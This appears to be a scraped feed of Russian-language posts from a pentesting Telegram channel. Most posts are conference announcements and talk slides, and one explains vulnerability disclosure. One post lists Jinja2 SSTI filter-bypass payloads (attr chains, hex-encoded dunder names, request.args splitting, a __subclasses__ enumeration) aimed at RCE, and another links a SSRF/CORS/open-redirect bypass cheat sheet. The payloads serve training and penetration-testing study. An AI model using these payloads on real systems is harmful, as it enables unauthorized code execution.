Работаешь в IT или с IT? Тогда тебе точно понравится на UIC DEV 2024! 💥
🖥 UIC Dev - ежегодная Технологическая конференция для специалистов из интернет-сферы: от HR-ов до IT-директоров. Да, мы не только для разработчиков, но и для аналитиков, тестировщиков, дизайнеров, маркетологов, SEO-шников, копирайтеров и т.д.❤
В этом году на нашей 7-ой вечеринке тебя ждут:
🎯 6 больших направлений по несколько секций: разработка, управление и анализ, бизнес+IT, дизайн и контент, маркетинг и digital, UIC Talks.
🎯 80+ докладов про инструменты, кейсы, "боли" IT-сообщества, AI и будущее.
🎯 Обсуждение актуальных событий, разбор трендов из области IT и не только.
🎯 Общение с единомышленниками, дискуссии, обмен опытом, новые идеи.
🎯 Интерактивы и розыгрыши призов на стендах партнеров.
Вечером первого дня пройдет🔥 афтепати с выступлением группы “Стихи на окнах подъезда №8”, дискотекой, лайтовым общением и развлечениями. 🚀
📅 7-8 октября 2024 г.
📍 ТРЦ “Сигма”, г. Ижевск, пер. Широкий, 53, 3-4 эт.
❗️ Подробности: uic.dev и vk.com/uicdev
В этом году на нашей 7-ой вечеринке тебя ждут:
🎯 6 больших направлений по несколько секций: разработка, управление и анализ, бизнес+IT, дизайн и контент, маркетинг и digital, UIC Talks.
🎯 80+ докладов про инструменты, кейсы, "боли" IT-сообщества, AI и будущее.
🎯 Обсуждение актуальных событий, разбор трендов из области IT и не только.
🎯 Общение с единомышленниками, дискуссии, обмен опытом, новые идеи.
🎯 Интерактивы и розыгрыши призов на стендах партнеров.
Вечером первого дня пройдет
📅 7-8 октября 2024 г.
📍 ТРЦ “Сигма”, г. Ижевск, пер. Широкий, 53, 3-4 эт.
❗️ Подробности: uic.dev и vk.com/uicdev
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍3❤2🥰1🦄1
[Обход фильтров в SSTI в Jinja2]
Не так давно в рамках подготовки к OSWE столкнулся с необходимостью обходить фильтры SSTI, проверяющие непосредственный темплейт.
Уязвимое приложение проверяло наличие
Поэтому ловите несколько способов модификации пейлоада, чтобы обойти подобные фильтры или даже WAF целиком:
🔸 Для обхода фильтра по
🔸 Можно использовать сложение строк или закодировать
🔸 Также можно обратиться к атрибутам по индексу
🔸 Кроме того, можно использовать
🔸 Для обхода фильтра по
🔸 Для обхода фильтра по
🔸 В случае, если встретился фильтр по
Конечно количество фильтров может быть разнообразным, но тут уже скорее встает вопрос комбинации предложенных выше методов. 👆
Для закрепления я разработал небольшой стенд 🔥. Кому будет интересно, то можете проверить знания и навыки в деле!
@GigaHack
#web #stand #SSTI #learn #OSWE
Не так давно в рамках подготовки к OSWE столкнулся с необходимостью обходить фильтры SSTI, проверяющие непосредственный темплейт.
Уязвимое приложение проверяло наличие
.__ в строке передаваемого темплейта, что не давало просто использовать пейлоад из HackTricks и наслаждаться RCE на уязвимой машине. Поэтому ловите несколько способов модификации пейлоада, чтобы обойти подобные фильтры или даже WAF целиком:
🔸 Для обхода фильтра по
.__ можно использовать |attr(){{ ''|attr('__class__’)}}🔸 Можно использовать сложение строк или закодировать
{{request|attr("__"+"class"+"__")}}
{{''['\x5f\x5fclass\x5f\x5f']}}🔸 Также можно обратиться к атрибутам по индексу
request["__class__"]
🔸 Кроме того, можно использовать
Statements для определения переменных в темплейте{% set string = "ssti" %}
{% set class = "__class__" %}
{{ string|attr(class)}}
{% with a = config.__class__.mro()[-1].__subclasses__() %} {{ a }} {% endwith %}🔸 Для обхода фильтра по
__ можно использовать requests.args для передачи частей полезной нагрузки в параметрах запроса и |join для соединения элементов в одну строку{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&class=class&usc=_🔸 Для обхода фильтра по
[] можно использовать |getlist(). Данный метод возвращает всех значения, связанные с определенным ключом в запросе{{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_🔸 В случае, если встретился фильтр по
|join, можно использовать |format для форматирования строк по переданным значениями{{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_Конечно количество фильтров может быть разнообразным, но тут уже скорее встает вопрос комбинации предложенных выше методов. 👆
Для закрепления я разработал небольшой стенд 🔥. Кому будет интересно, то можете проверить знания и навыки в деле!
@GigaHack
#web #stand #SSTI #learn #OSWE
👍19🔥6❤1👌1🦄1
[Полезный читшит для SSRF, CORS и open-redirect]
В последнее время у portswigger-а активно пополняются заметки по различным темам. Эта шпаргалка содержит полезные нагрузки для обхода проверки URL. Приведенные списки слов полезны для реализации следующих типов атак: SSRF, неправильные конфигурации CORS и open-redirect. Очень полезно, если кончились идеи, а ошибку с кодом 403 обходить надо. Также будет полезно и тем, кто только погружается историю с данными веб-уязвимостями.
https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet
#web #bypass #cheet_sheet
В последнее время у portswigger-а активно пополняются заметки по различным темам. Эта шпаргалка содержит полезные нагрузки для обхода проверки URL. Приведенные списки слов полезны для реализации следующих типов атак: SSRF, неправильные конфигурации CORS и open-redirect. Очень полезно, если кончились идеи, а ошибку с кодом 403 обходить надо. Также будет полезно и тем, кто только погружается историю с данными веб-уязвимостями.
https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet
#web #bypass #cheet_sheet
🔥14👍3👌3🦄1
Forwarded from Just Security
This media is not supported in your browser
VIEW IN TELEGRAM
Опубликовали видеоролик о том, как прошла ежегодная независимая премия Pentest award 2024!
Радостные лица, толпа заряженных специалистов, и, конечно, счастливые победители с наградами в руках — настоящий праздник этичного хакинга.
Здорово было встретится в офлайне со старыми друзьями и коллегами, познакомиться с новыми людьми, обменяться знаниями и идеями, поговорить о важном, профессиональном, наболевшем.
До встречи в 2025 году 👋
Отдельная благодарность партнерам проекта: BI.ZONE Bug Bounty, VK Bug Bounty, OFFZONE и CyberED.
📺 Полное видео
🔗 Pentest award (архив)
❤ @justsecurity
Радостные лица, толпа заряженных специалистов, и, конечно, счастливые победители с наградами в руках — настоящий праздник этичного хакинга.
Здорово было встретится в офлайне со старыми друзьями и коллегами, познакомиться с новыми людьми, обменяться знаниями и идеями, поговорить о важном, профессиональном, наболевшем.
До встречи в 2025 году 👋
Отдельная благодарность партнерам проекта: BI.ZONE Bug Bounty, VK Bug Bounty, OFFZONE и CyberED.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13🔥6❤4🦄1
Всем привет! Сегодня выступаю на вебинаре у УЦ Маском (@mascom_uc). Расскажу о том как проводить разведку при пентесте внешнего периметра и веб-приложения и какие инструменты можно для этого использовать.
Ждём всех сегодня в 19.00 по МСК 😎
Кто ещё не записался, сделать это можно по 👉 ссылке
👉Презентация
#web #conference
Ждём всех сегодня в 19.00 по МСК 😎
Кто ещё не записался, сделать это можно по 👉 ссылке
👉Презентация
#web #conference
🔥21👍5❤4🦄1
[Регистрация уязвимостей]
Всем привет!👋
Сегодня хочу поднять важную тему для каждого ИБ-специалиста, особенно пентестера. Однажды вы можете обнаружить уязвимость, которую никто нигде не публиковал, и не важно, специально вы ее искали или нашли мимоходом.👀 Будучи настоящими этичными хакерами у вас может возникнуть желание сообщить об уязвимости вендору/производителю софта или оборудования, но как это это сделать?
Чутка теории: зарегистрировать уязвимость можно в БДУ ФСТЭК (но только в ПО, которое "используется на объектах ГИС и КИИ"), со всеми остальными уязвимостями нужно идти в MITRE и регистрировать CVE.🐈
Весь процесс очень зависит от вендора, с которым вы взаимодействуете, но если вам повезло, то в идеале это будет строиться примерно по схеме, которую я разместил в своих заметках.📝
Иногда бывают различные выдающиеся случаи💻 , о которых лучше говорить отдельно и в формате подкаста или посиделок (кстати, если у вас есть такие истории и желание поделиться ими - дайте знать в комментах или в ЛС) ✏️
В заключении хочется сказать, что безумно приятно взаимодействовать с адекватными вендорами, которые ради тебя готовы даже открыть зал славы.🔥
#cve #learn #notes
Всем привет!
Сегодня хочу поднять важную тему для каждого ИБ-специалиста, особенно пентестера. Однажды вы можете обнаружить уязвимость, которую никто нигде не публиковал, и не важно, специально вы ее искали или нашли мимоходом.
Чутка теории: зарегистрировать уязвимость можно в БДУ ФСТЭК (но только в ПО, которое "используется на объектах ГИС и КИИ"), со всеми остальными уязвимостями нужно идти в MITRE и регистрировать CVE.
Весь процесс очень зависит от вендора, с которым вы взаимодействуете, но если вам повезло, то в идеале это будет строиться примерно по схеме, которую я разместил в своих заметках.
Иногда бывают различные выдающиеся случаи
В заключении хочется сказать, что безумно приятно взаимодействовать с адекватными вендорами, которые ради тебя готовы даже открыть зал славы.
#cve #learn #notes
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17🔥9❤4🥰1🌭1
[Кибербез комьюнити]
Всем привет!👋
Коллеги из «ГОС ИТ Богатырева» включили наш канал в папку по кибербезопасности.🗂
В папке собраны каналы с полезной информацией в мире ИБ на самый разный вкус! Думаю, что подборка будет расширяться и обновляться, поэтому следите за новостями!
Добавляйте к себе папку и делить с друзьями и коллегами🏆
#learn #start
Всем привет!
Коллеги из «ГОС ИТ Богатырева» включили наш канал в папку по кибербезопасности.
В папке собраны каналы с полезной информацией в мире ИБ на самый разный вкус! Думаю, что подборка будет расширяться и обновляться, поэтому следите за новостями!
Добавляйте к себе папку и делить с друзьями и коллегами
#learn #start
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15👍6❤5🦄1
[История одного пробива]
Всем привет!👋
Админка на домене 5 уровня? Дефолтные креды? Пароли хранятся на фронте? SQL-injection с RCE? DNS-shell? Что это все такое? Нет - это не очередная тачка на Hack the Box и не подарок пентестеру на НГ от деда мороза.🎁
Это тру стори от нашего коллеги @cucurucuq.❤
Читается достаточно легко, всем рекомендую ознакомиться - каждый может найти что-то полезное для себя.🙏
#magazine #GigaHackers
Всем привет!
Админка на домене 5 уровня? Дефолтные креды? Пароли хранятся на фронте? SQL-injection с RCE? DNS-shell? Что это все такое? Нет - это не очередная тачка на Hack the Box и не подарок пентестеру на НГ от деда мороза.
Это тру стори от нашего коллеги @cucurucuq.
Читается достаточно легко, всем рекомендую ознакомиться - каждый может найти что-то полезное для себя.
#magazine #GigaHackers
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥22👍9❤3🌭2👏1
Purple_ESC11.pdf
2 MB
[SOC Tech - Коллаборация SOC и Pentest]
Всем привет!👋
Выступил на SOC Tech совместно с коллегой из SOC @nikostin26.
Рассказывали про наш опыт взаимодействия между отделами.
Из ключевых тезисов:
🟣 раскрыли нашу концепцию взаимодействия
🟣 продемонстрировали совместную работу на примере ESC11
🟣 показали необходимость и эффективность такого подхода
Из интересного:
🔴 полный chain эксплуатации ESC11 от обнаружения до получения сертификата
🔘 способы защиты от уязвимости, в том числе компенсирующие меры
🔘 способы обнаружения атаки
Презентация во вложении!📌
В скором времени выпустим статью на эту тему, следите за новостями, готовим много всего интересного!💗
@GigaHack
#soc_tech #AD #conference
Всем привет!
Выступил на SOC Tech совместно с коллегой из SOC @nikostin26.
Рассказывали про наш опыт взаимодействия между отделами.
Из ключевых тезисов:
Из интересного:
Презентация во вложении!
В скором времени выпустим статью на эту тему, следите за новостями, готовим много всего интересного!
@GigaHack
#soc_tech #AD #conference
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥20👍7❤3
[Киберучения 2024]
Всем привет!
С 24 по 26 октября в Екатеринбурге в рамках ИТ-конгресса «Форум будущего» на базе Уральского федерального университета пройдут всероссийские студенческие Киберучения.
Помимо соревнований на форуме также будут интересные доклады и вот несколько из них:
🔔 @WILD_41 выступит с докладом "Fast recon — быстрая разведка при пентесте веб-приложения"🆒
🔔 Евгений Баклушин осветит "Важные вопросы о карьере в ИБ"😮
🔔 Также выступят наши коллеги с докладом про пентест CI/CD: "Пентест CI/CD GitLab на реальном примере"🔝
Если вы будете в Екб — обязательно рекомендуем к посещению, но можно и онлайн👍
Регистрируйтесь и смотрите много крутых докладов!
#learn #conference
Всем привет!
С 24 по 26 октября в Екатеринбурге в рамках ИТ-конгресса «Форум будущего» на базе Уральского федерального университета пройдут всероссийские студенческие Киберучения.
Помимо соревнований на форуме также будут интересные доклады и вот несколько из них:
Если вы будете в Екб — обязательно рекомендуем к посещению, но можно и онлайн
Регистрируйтесь и смотрите много крутых докладов!
#learn #conference
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍8👌3
Telegram
GigaHackers
🔥18👍6❤5🌭2❤🔥1
Forwarded from SOC FORUM | Неделя кибербезопасности
Что общего у защитников и нападающих?
И те, и другие придут 8 ноября в 13:20 на доклад Владислава Дриева «Центр мисконфигурации AD. Берем домены с помощью SCCM».
Регистрируйтесь на форум, чтобы не пропустить выступление.
Регистрируйтесь на форум, чтобы не пропустить выступление.
👍12❤4🔥3👌1🦄1
Forwarded from SOC FORUM | Неделя кибербезопасности
This media is not supported in your browser
VIEW IN TELEGRAM
🔥25❤6👍6🦄1
[Импортозамещенный взгляд на социальную инженерию: что, если не Word & Windows]
Всем привет!👋
Уже 8 ноября я выступлю на SOC-FORUM 2024 совместно с @Nam3User. Поговорим за социалку😂
Зачастую атаки методами социальной инженерии так или иначе задействуют Microsoft Office, однако в условиях импортозамещения компании начинают переходить на альтернативные офисные пакеты. Защищены ли пользователи альтернативных решений от атак методами социальной инженерии? Расскажем в нашем докладе.
Программу с другими докладами можно посмотреть тут. Онлайн также обещают подвезти▶️
#conference #soc_forum2024
Всем привет!
Уже 8 ноября я выступлю на SOC-FORUM 2024 совместно с @Nam3User. Поговорим за социалку
Зачастую атаки методами социальной инженерии так или иначе задействуют Microsoft Office, однако в условиях импортозамещения компании начинают переходить на альтернативные офисные пакеты. Защищены ли пользователи альтернативных решений от атак методами социальной инженерии? Расскажем в нашем докладе.
Программу с другими докладами можно посмотреть тут. Онлайн также обещают подвезти
#conference #soc_forum2024
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16🔥10👌4🦄1
GigaHackers
[Импортозамещенный взгляд на социальную инженерию: что, если не Word & Windows] Всем привет!👋 Уже 8 ноября я выступлю на SOC-FORUM 2024 совместно с @Nam3User. Поговорим за социалку😂 Зачастую атаки методами социальной инженерии так или иначе задействуют…
SOC_Forum_Импортозамещенный_взгляд_на_социальную_инженерию.pdf
3.6 MB
Выкладываю презентацию с нашего выступления на SOC форуме⚡
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥25👍6👏3🤪2🥱1
SOC_Forum_Дриев_final.pdf
4.5 MB
[Презентация с SOC FORUM]
Наконец-то выкладываю презентацию с SOC FORUM, на мой взгляд получился неплохой доклад, постарался на пальцах объяснить популярные техники повышения привилегий в домене AD через SCCM.📎
Также ссылка на видосик🚀
Если есть какие-то вопросы, пишите в комменты или в ЛС, с удовольствием отвечу!🔥
@GigaHack
#AD #SCCM #MECM #soc_forum2024 #conference #learn
Наконец-то выкладываю презентацию с SOC FORUM, на мой взгляд получился неплохой доклад, постарался на пальцах объяснить популярные техники повышения привилегий в домене AD через SCCM.
Также ссылка на видосик
Если есть какие-то вопросы, пишите в комменты или в ЛС, с удовольствием отвечу!
@GigaHack
#AD #SCCM #MECM #soc_forum2024 #conference #learn
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥25👍9❤4🥱1😴1
Всем привет👋
📱 VK тоже поддерживает тренд с конференциями в сфере КБ ✨
VK Security Confab Max - конференция по кибербезопасности, которая пройдёт 11 декабря в Москве.
Если у вас есть экспертиза в этой области, расскажите о ней! Заявку можно отправить до 29 ноября на сайте.
На конференции будут фигурировать пять основных тем:
✅ SOC
✅ AppSec
✅ Безопасность пользователей
✅ Безопасность облаков
✅ Безопасность инфраструктуры
Сами особенно ждём доклады по безопасности инфры и облаков🔝
Обещают активности на весь день: будут технические доклады, нетворкинг и афтепати
Для тех, кто не сможет приехать в офис, будет организована онлайн-трансляция.
От себя рекомендуем, ждём, что будет актуально и интересно
Из первых уст о конференции можно узнать тут
VK Security Confab Max - конференция по кибербезопасности, которая пройдёт 11 декабря в Москве.
Если у вас есть экспертиза в этой области, расскажите о ней! Заявку можно отправить до 29 ноября на сайте.
На конференции будут фигурировать пять основных тем:
Сами особенно ждём доклады по безопасности инфры и облаков
Обещают активности на весь день: будут технические доклады, нетворкинг и афтепати
Для тех, кто не сможет приехать в офис, будет организована онлайн-трансляция.
От себя рекомендуем, ждём, что будет актуально и интересно
Из первых уст о конференции можно узнать тут
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤6🔥5👎3🤮1
[Как некорректная разработка API может привести к удалению пользователей]
Всем привет!👋
Пора снова делиться интересным профильным контентом⚡
Летом @WILD_41 стал номинантом премии Pentest Award. Его кейс решили подробно разобрать и осветить на habr-е.⚙️
При анализе веб-приложения была обнаружена связка уязвимостей, позволявшая удалить любого зарегистрированного пользователя из системы. Основано на реальных событиях😒
#web
Всем привет!👋
Пора снова делиться интересным профильным контентом
Летом @WILD_41 стал номинантом премии Pentest Award. Его кейс решили подробно разобрать и осветить на habr-е.
При анализе веб-приложения была обнаружена связка уязвимостей, позволявшая удалить любого зарегистрированного пользователя из системы. Основано на реальных событиях
#web
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Как некорректная разработка API может привести к удалению пользователей
В продолжение рассказа об уязвимостях, которые были обнаружены пентестерами УЦСБ и легли в основу кейсов на премии Pentest Award, публикуем разбор следующего реального примера. Расскажем, как в...
🔥14❤4👍4🦄1
[ BUGS ZONE 3.0 ]
Всем привет!⭐
В прошедшую пятницу посетил приватный ивент для багхантеров от @bizone_bb BUGS ZONE 3.0🔥
Было круто: познакомился со многими классными ребятами, настоящими профи в bug bounty.💵
Пообщались/поели/попили/послушали доклады от лучших исследователей платформы.
Спасибо организаторам за приглашение, мотивируете охотиться за багами ещё активнее, чтобы залетать в топы✈️
P/S Отдельно поздравляем нашего товарища @crusher404 с заслуженным 2 местом⚡
#bug_bounty #bugs_zone3
Всем привет!
В прошедшую пятницу посетил приватный ивент для багхантеров от @bizone_bb BUGS ZONE 3.0
Было круто: познакомился со многими классными ребятами, настоящими профи в bug bounty.
Пообщались/поели/попили/послушали доклады от лучших исследователей платформы.
Спасибо организаторам за приглашение, мотивируете охотиться за багами ещё активнее, чтобы залетать в топы
P/S Отдельно поздравляем нашего товарища @crusher404 с заслуженным 2 местом
#bug_bounty #bugs_zone3
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21❤5👍5🦄1